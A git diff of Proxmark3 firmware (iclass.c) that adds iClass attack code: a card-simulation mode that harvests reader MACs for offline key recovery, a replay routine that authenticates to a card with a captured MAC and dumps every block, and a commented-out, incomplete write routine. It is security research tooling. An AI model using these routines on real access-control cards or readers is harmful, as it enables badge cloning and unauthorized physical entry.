]> cvs.zerfleddert.de Git - proxmark3-svn/blobdiff - armsrc/iclass.c
Merge remote-tracking branch 'origin/master' into PenturaLabs-iclass-research
[proxmark3-svn] / armsrc / iclass.c
index 7289abbc2a465250a222cb3f07a6e111a4f1fe9a..0ff24bfdd08f8eb0eb45f90e045b4b9db87a22fb 100644 (file)
 #include "util.h"
 #include "string.h"
 #include "common.h"
+#include "cmd.h"
 // Needed for CRC in emulation mode;
 // same construction as in ISO 14443;
 // different initial value (CRC_ICLASS)
 #include "iso14443crc.h"
+#include "iso15693tools.h"
 
 static int timeout = 4096;
 
@@ -669,6 +671,8 @@ void RAMFUNC SnoopIClass(void)
     // The response (tag -> reader) that we're receiving.
        uint8_t *tagToReaderResponse = (((uint8_t *)BigBuf) + RECV_RES_OFFSET);
 
+    FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
     // reset traceLen to 0
     iso14a_set_tracing(TRUE);
     iso14a_clear_trace();
@@ -954,7 +958,7 @@ static void CodeIClassTagSOF()
        // Convert from last byte pos to length
        ToSendMax++;
 }
-
+int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived, uint8_t *reader_mac_buf);
 /**
  * @brief SimulateIClass simulates an iClass card.
  * @param arg0 type of simulation
@@ -971,43 +975,49 @@ void SimulateIClass(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain
 {
        uint32_t simType = arg0;
        uint32_t numberOfCSNS = arg1;
+       FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
 
        // Enable and clear the trace
        iso14a_set_tracing(TRUE);
        iso14a_clear_trace();
 
        uint8_t csn_crc[] = { 0x03, 0x1f, 0xec, 0x8a, 0xf7, 0xff, 0x12, 0xe0, 0x00, 0x00 };
-
        if(simType == 0) {
                // Use the CSN from commandline
                memcpy(csn_crc, datain, 8);
-               doIClassSimulation(csn_crc,0);
+               doIClassSimulation(csn_crc,0,NULL);
        }else if(simType == 1)
        {
-               doIClassSimulation(csn_crc,0);
+               doIClassSimulation(csn_crc,0,NULL);
        }
        else if(simType == 2)
        {
+
+               uint8_t mac_responses[64] = { 0 };
                Dbprintf("Going into attack mode");
                // In this mode, a number of csns are within datain. We'll simulate each one, one at a time
                // in order to collect MAC's from the reader. This can later be used in an offlne-attack
                // in order to obtain the keys, as in the "dismantling iclass"-paper.
-               for(int i = 0 ; i < numberOfCSNS && i*8+8 < USB_CMD_DATA_SIZE; i++)
+               int i = 0;
+               for( ; i < numberOfCSNS && i*8+8 < USB_CMD_DATA_SIZE; i++)
                {
                        // The usb data is 512 bytes, fitting 65 8-byte CSNs in there.
 
                        memcpy(csn_crc, datain+(i*8), 8);
-                       if(doIClassSimulation(csn_crc,1))
+                       if(doIClassSimulation(csn_crc,1,mac_responses))
                        {
                                return; // Button pressed
                        }
                }
+               cmd_send(CMD_ACK,CMD_SIMULATE_TAG_ICLASS,i,0,mac_responses,i*8);
+
        }
        else{
                // We may want a mode here where we hardcode the csns to use (from proxclone).
                // That will speed things up a little, but not required just yet.
                Dbprintf("The mode is not implemented, reserved for future use");
        }
+       Dbprintf("Done...");
 
 }
 /**
@@ -1015,9 +1025,10 @@ void SimulateIClass(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain
  * @param csn - csn to use
  * @param breakAfterMacReceived if true, returns after reader MAC has been received.
  */
-int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
+int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived, uint8_t *reader_mac_buf)
 {
 
+
        // CSN followed by two CRC bytes
        uint8_t response2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
        uint8_t response3[] = { 0,0,0,0,0,0,0,0,0,0};
@@ -1092,10 +1103,11 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
 
 
        // Start from off (no field generated)
-       FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
-       SpinDelay(200);
-
-
+       //FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
+       //SpinDelay(200);
+       FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_TAGSIM_LISTEN);
+       SpinDelay(100);
+       StartCountSspClk();
        // We need to listen to the high-frequency, peak-detected path.
        SetAdcMuxFor(GPIO_MUXSEL_HIPKD);
        FpgaSetupSsc();
@@ -1107,10 +1119,14 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
        uint32_t r2t_time =0;
 
        LED_A_ON();
-       bool displayDebug = true;
        bool buttonPressed = false;
+
+       /** Hack  for testing
+       memcpy(reader_mac_buf,csn,8);
+       exitLoop = true;
+       end hack **/
+
        while(!exitLoop) {
-               displayDebug = true;
 
                LED_B_OFF();
                //Signal tracer
@@ -1131,13 +1147,11 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
                        resp = resp1; respLen = resp1Len; //order = 1;
                        respdata = &sof;
                        respsize = sizeof(sof);
-                       displayDebug = false;
                } else if(receivedCmd[0] == 0x0c) {
                        // Reader asks for anticollission CSN
                        resp = resp2; respLen = resp2Len; //order = 2;
                        respdata = response2;
                        respsize = sizeof(response2);
-                       //displayDebug = false;
                        //DbpString("Reader requests anticollission CSN:");
                } else if(receivedCmd[0] == 0x81) {
                        // Reader selects anticollission CSN.
@@ -1155,18 +1169,21 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
                } else if(receivedCmd[0] == 0x05) {
                        // Reader random and reader MAC!!!
                        // Do not respond
-                       // We do not know what to answer, so lets keep quit
+            // We do not know what to answer, so lets keep quiet
                        resp = resp1; respLen = 0; //order = 5;
                        respdata = NULL;
                        respsize = 0;
                        if (breakAfterMacReceived){
-                               // TODO, actually return this to the caller instead of just
                                // dbprintf:ing ...
-                               Dbprintf("CSN: %02x %02x %02x %02x %02x %02x %02x %02x");
+                               Dbprintf("CSN: %02x %02x %02x %02x %02x %02x %02x %02x",csn[0],csn[1],csn[2],csn[3],csn[4],csn[5],csn[6],csn[7]);
                                Dbprintf("RDR:  (len=%02d): %02x %02x %02x %02x %02x %02x %02x %02x %02x",len,
                                                 receivedCmd[0], receivedCmd[1], receivedCmd[2],
                                                receivedCmd[3], receivedCmd[4], receivedCmd[5],
                                                receivedCmd[6], receivedCmd[7], receivedCmd[8]);
+                               if (reader_mac_buf != NULL)
+                               {
+                                       memcpy(reader_mac_buf,receivedCmd+1,8);
+                               }
                                exitLoop = true;
                        }
                } else if(receivedCmd[0] == 0x00 && len == 1) {
@@ -1190,7 +1207,7 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
 
                if(cmdsRecvd >  100) {
                        //DbpString("100 commands later...");
-                       break;
+                       //break;
                }
                else {
                        cmdsRecvd++;
@@ -1199,29 +1216,13 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
                if(respLen > 0) {
                        SendIClassAnswer(resp, respLen, 21);
                        t2r_time = GetCountSspClk();
-
-//                     }
-                       if(displayDebug) Dbprintf("R2T:(len=%d): %x %x %x %x %x %x %x %x %x\nT2R: (total/data =%d/%d): %x %x %x %x %x %x %x %x %x",
-                       len,
-                       receivedCmd[0], receivedCmd[1], receivedCmd[2],
-                       receivedCmd[3], receivedCmd[4], receivedCmd[5],
-                       receivedCmd[6], receivedCmd[7], receivedCmd[8],
-                       respLen,respsize,
-                       resp[0], resp[1], resp[2],
-                       resp[3], resp[4], resp[5],
-                       resp[6], resp[7], resp[8]);
-
                }
 
                if (tracing) {
-                       //LogTrace(receivedCmd,len, rsamples, Uart.parityBits, TRUE);
-
                        LogTrace(receivedCmd,len, (r2t_time-time_0)<< 4, Uart.parityBits,TRUE);
                        LogTrace(NULL,0, (r2t_time-time_0) << 4, 0,TRUE);
 
                        if (respdata != NULL) {
-                               //LogTrace(respdata,respsize, rsamples, SwapBits(GetParity(respdata,respsize),respsize), FALSE);
-                               //if(!LogTrace(resp,respLen, rsamples,SwapBits(GetParity(respdata,respsize),respsize),FALSE))
                                LogTrace(respdata,respsize, (t2r_time-time_0) << 4,SwapBits(GetParity(respdata,respsize),respsize),FALSE);
                                LogTrace(NULL,0, (t2r_time-time_0) << 4,0,FALSE);
 
@@ -1236,7 +1237,7 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
                memset(receivedCmd, 0x44, RECV_CMD_SIZE);
        }
 
-       Dbprintf("%x", cmdsRecvd);
+       //Dbprintf("%x", cmdsRecvd);
        LED_A_OFF();
        LED_B_OFF();
        if(buttonPressed)
@@ -1465,16 +1466,255 @@ int ReaderReceiveIClass(uint8_t* receivedAnswer)
   return Demod.len;
 }
 
+void setupIclassReader()
+{
+    FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
+    // Reset trace buffer
+    iso14a_set_tracing(TRUE);
+    iso14a_clear_trace();
+
+    // Setup SSC
+    FpgaSetupSsc();
+    // Start from off (no field generated)
+    // Signal field is off with the appropriate LED
+    LED_D_OFF();
+    FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
+    SpinDelay(200);
+
+    SetAdcMuxFor(GPIO_MUXSEL_HIPKD);
+
+    // Now give it time to spin up.
+    // Signal field is on with the appropriate LED
+    FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_READER_MOD);
+    SpinDelay(200);
+    LED_A_ON();
+
+}
+
 // Reader iClass Anticollission
 void ReaderIClass(uint8_t arg0) {
+    uint8_t act_all[]     = { 0x0a };
+    uint8_t identify[]    = { 0x0c };
+    uint8_t select[]      = { 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+    uint8_t readcheck_cc[]= { 0x88, 0x02 };
+
+    uint8_t card_data[24]={0};
+    uint8_t last_csn[8]={0};
+
+    uint8_t* resp = (((uint8_t *)BigBuf) + 3560);      // was 3560 - tied to other size changes
+
+    int read_status= 0;
+    bool abort_after_read = arg0 & FLAG_ICLASS_READER_ONLY_ONCE;
+
+    setupIclassReader();
+
+    size_t datasize = 0;
+    while(!BUTTON_PRESS())
+    {
+        WDT_HIT();
+
+        // Send act_all
+        ReaderTransmitIClass(act_all, 1);
+        // Card present?
+        if(ReaderReceiveIClass(resp)) {
+
+            ReaderTransmitIClass(identify, 1);
+
+            if(ReaderReceiveIClass(resp) == 10) {
+                //Copy the Anti-collision CSN to our select-packet
+                memcpy(&select[1],resp,8);
+                //Dbprintf("Anti-collision CSN: %02x %02x %02x %02x %02x %02x %02x %02x",resp[0], resp[1], resp[2],
+                //        resp[3], resp[4], resp[5],
+                //        resp[6], resp[7]);
+                //Select the card
+                ReaderTransmitIClass(select, sizeof(select));
+
+                if(ReaderReceiveIClass(resp) == 10) {
+                    //Save CSN in response data
+                    memcpy(card_data,resp,8);
+                    datasize += 8;
+                    //Flag that we got to at least stage 1, read CSN
+                    read_status = 1;
+
+                    // Card selected
+                    //Dbprintf("Readcheck on Sector 2");
+                    ReaderTransmitIClass(readcheck_cc, sizeof(readcheck_cc));
+                    if(ReaderReceiveIClass(resp) == 8) {
+                        //Save CC (e-purse) in response data
+                        memcpy(card_data+8,resp,8);
+                        datasize += 8;
+                        //Got both
+                        read_status = 2;
+                    }
+
+                    LED_B_ON();
+                    //Send back to client, but don't bother if we already sent this
+                    if(memcmp(last_csn, card_data, 8) != 0)
+                        cmd_send(CMD_ACK,read_status,0,0,card_data,datasize);
+
+                    //Save that we already sent this....
+                    if(read_status ==  2)
+                        memcpy(last_csn, card_data, 8);
+
+                    LED_B_OFF();
+
+                    if(abort_after_read) break;
+                }
+            }
+        }
+
+        if(traceLen > TRACE_SIZE) {
+            DbpString("Trace full");
+            break;
+        }
+    }
+    LED_A_OFF();
+}
+
+void ReaderIClass_Replay(uint8_t arg0, uint8_t *MAC) {
        uint8_t act_all[]     = { 0x0a };
        uint8_t identify[]    = { 0x0c };
        uint8_t select[]      = { 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+       uint8_t readcheck_cc[]= { 0x88, 0x02 };
+       uint8_t check[]       = { 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+       uint8_t read[]        = { 0x0c, 0x00, 0x00, 0x00 };
+       
+    uint16_t crc = 0;
+       uint8_t cardsize=0;
+       bool read_success=false;
+       uint8_t mem=0;
+       
+       static struct memory_t{
+         int k16;
+         int book;
+         int k2;
+         int lockauth;
+         int keyaccess;
+       } memory;
+       
+       uint8_t* resp = (((uint8_t *)BigBuf) + 3560);   // was 3560 - tied to other size changes
+
+    setupIclassReader();
 
+
+       for(int i=0;i<1;i++) {
+       
+               if(traceLen > TRACE_SIZE) {
+                       DbpString("Trace full");
+                       break;
+               }
+               
+               if (BUTTON_PRESS()) break;
+
+               // Send act_all
+               ReaderTransmitIClass(act_all, 1);
+               // Card present?
+               if(ReaderReceiveIClass(resp)) {
+                       ReaderTransmitIClass(identify, 1);
+                       if(ReaderReceiveIClass(resp) == 10) {
+                               // Select card          
+                               memcpy(&select[1],resp,8);
+                               ReaderTransmitIClass(select, sizeof(select));
+
+                               if(ReaderReceiveIClass(resp) == 10) {
+                                       Dbprintf("     Selected CSN: %02x %02x %02x %02x %02x %02x %02x %02x",
+                                       resp[0], resp[1], resp[2],
+                                       resp[3], resp[4], resp[5],
+                                       resp[6], resp[7]);
+                               }
+                               // Card selected
+                               Dbprintf("Readcheck on Sector 2");
+                               ReaderTransmitIClass(readcheck_cc, sizeof(readcheck_cc));
+                               if(ReaderReceiveIClass(resp) == 8) {
+                                  Dbprintf("     CC: %02x %02x %02x %02x %02x %02x %02x %02x",
+                                       resp[0], resp[1], resp[2],
+                                       resp[3], resp[4], resp[5],
+                                       resp[6], resp[7]);
+                               }else return;
+                               Dbprintf("Authenticate");
+                               //for now replay captured auth (as cc not updated)
+                               memcpy(check+5,MAC,4);
+                //Dbprintf("     AA: %02x %02x %02x %02x",
+                //     check[5], check[6], check[7],check[8]);
+                               ReaderTransmitIClass(check, sizeof(check));
+                               if(ReaderReceiveIClass(resp) == 4) {
+                                  Dbprintf("     AR: %02x %02x %02x %02x",
+                                       resp[0], resp[1], resp[2],resp[3]);
+                               }else {
+                                 Dbprintf("Error: Authentication Fail!");
+                                 return;
+                               }
+                               Dbprintf("Dump Contents");
+                               //first get configuration block
+                               read_success=false;
+                               read[1]=1;
+                               uint8_t *blockno=&read[1];
+                               crc = iclass_crc16((char *)blockno,1);
+                               read[2] = crc >> 8;
+                               read[3] = crc & 0xff;
+                               while(!read_success){
+                                     ReaderTransmitIClass(read, sizeof(read));
+                                     if(ReaderReceiveIClass(resp) == 10) {
+                                        read_success=true;
+                                        mem=resp[5];
+                                        memory.k16= (mem & 0x80);
+                                        memory.book= (mem & 0x20);
+                                        memory.k2= (mem & 0x8);
+                                        memory.lockauth= (mem & 0x2);
+                                        memory.keyaccess= (mem & 0x1);
+
+                                     }
+                               }
+                               if (memory.k16){
+                                 cardsize=255;
+                               }else cardsize=32;
+                               //then loop around remaining blocks
+                               for(uint8_t j=0; j<cardsize; j++){
+                                   read_success=false;
+                                   uint8_t *blockno=&j;
+                                   //crc_data[0]=j;
+                                   read[1]=j;
+                                   crc = iclass_crc16((char *)blockno,1);
+                                   read[2] = crc >> 8;
+                                   read[3] = crc & 0xff;
+                                   while(!read_success){
+                                     ReaderTransmitIClass(read, sizeof(read));
+                                     if(ReaderReceiveIClass(resp) == 10) {
+                                        read_success=true;
+                                        Dbprintf("     %02x: %02x %02x %02x %02x %02x %02x %02x %02x",
+                                         j, resp[0], resp[1], resp[2],
+                                         resp[3], resp[4], resp[5],
+                                         resp[6], resp[7]);
+                                     }
+                                   }
+                               }
+                       }
+               }
+               WDT_HIT();
+       }
+       
+       LED_A_OFF();
+}
+
+//2. Create Read method (cut-down from above) based off responses from 1. 
+//   Since we have the MAC could continue to use replay function.
+//3. Create Write method
+/*
+void IClass_iso14443A_write(uint8_t arg0, uint8_t blockNo, uint8_t *data, uint8_t *MAC) {
+       uint8_t act_all[]     = { 0x0a };
+       uint8_t identify[]    = { 0x0c };
+       uint8_t select[]      = { 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+       uint8_t readcheck_cc[]= { 0x88, 0x02 };
+       uint8_t check[]       = { 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+       uint8_t read[]        = { 0x0c, 0x00, 0x00, 0x00 };
+       uint8_t write[]       = { 0x87, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+       
+    uint16_t crc = 0;
+       
        uint8_t* resp = (((uint8_t *)BigBuf) + 3560);   // was 3560 - tied to other size changes
 
        // Reset trace buffer
-       memset(trace, 0x44, RECV_CMD_OFFSET);
+    memset(trace, 0x44, RECV_CMD_OFFSET);
        traceLen = 0;
 
        // Setup SSC
@@ -1494,7 +1734,7 @@ void ReaderIClass(uint8_t arg0) {
 
        LED_A_ON();
 
-       for(;;) {
+       for(int i=0;i<1;i++) {
        
                if(traceLen > TRACE_SIZE) {
                        DbpString("Trace full");
@@ -1519,13 +1759,67 @@ void ReaderIClass(uint8_t arg0) {
                                        resp[3], resp[4], resp[5],
                                        resp[6], resp[7]);
                                }
-                               // Card selected, whats next... ;-)
-                       }
+                               // Card selected
+                               Dbprintf("Readcheck on Sector 2");
+                               ReaderTransmitIClass(readcheck_cc, sizeof(readcheck_cc));
+                               if(ReaderReceiveIClass(resp) == 8) {
+                                  Dbprintf("     CC: %02x %02x %02x %02x %02x %02x %02x %02x",
+                                       resp[0], resp[1], resp[2],
+                                       resp[3], resp[4], resp[5],
+                                       resp[6], resp[7]);
+                               }else return;
+                               Dbprintf("Authenticate");
+                               //for now replay captured auth (as cc not updated)
+                               memcpy(check+5,MAC,4);
+                               Dbprintf("     AA: %02x %02x %02x %02x",
+                                       check[5], check[6], check[7],check[8]);
+                               ReaderTransmitIClass(check, sizeof(check));
+                               if(ReaderReceiveIClass(resp) == 4) {
+                                  Dbprintf("     AR: %02x %02x %02x %02x",
+                                       resp[0], resp[1], resp[2],resp[3]);
+                               }else {
+                                 Dbprintf("Error: Authentication Fail!");
+                                 return;
+                               }
+                               Dbprintf("Write Block");
+                               
+                               //read configuration for max block number
+                               read_success=false;
+                               read[1]=1;
+                               uint8_t *blockno=&read[1];
+                               crc = iclass_crc16((char *)blockno,1);
+                               read[2] = crc >> 8;
+                               read[3] = crc & 0xff;
+                               while(!read_success){
+                                     ReaderTransmitIClass(read, sizeof(read));
+                                     if(ReaderReceiveIClass(resp) == 10) {
+                                        read_success=true;
+                                        mem=resp[5];
+                                        memory.k16= (mem & 0x80);
+                                        memory.book= (mem & 0x20);
+                                        memory.k2= (mem & 0x8);
+                                        memory.lockauth= (mem & 0x2);
+                                        memory.keyaccess= (mem & 0x1);
+
+                                     }
+                               }
+                               if (memory.k16){
+                                 cardsize=255;
+                               }else cardsize=32;
+                               //check card_size
+                               
+                               memcpy(write+1,blockNo,1);
+                               memcpy(write+2,data,8);
+                               memcpy(write+10,mac,4);
+                               while(!send_success){
+                                 ReaderTransmitIClass(write, sizeof(write));
+                                 if(ReaderReceiveIClass(resp) == 10) {
+                                   write_success=true;
+                               }
+                       }//
                }
                WDT_HIT();
        }
        
        LED_A_OFF();
-}
-
-
+}*/
Impressum, Datenschutz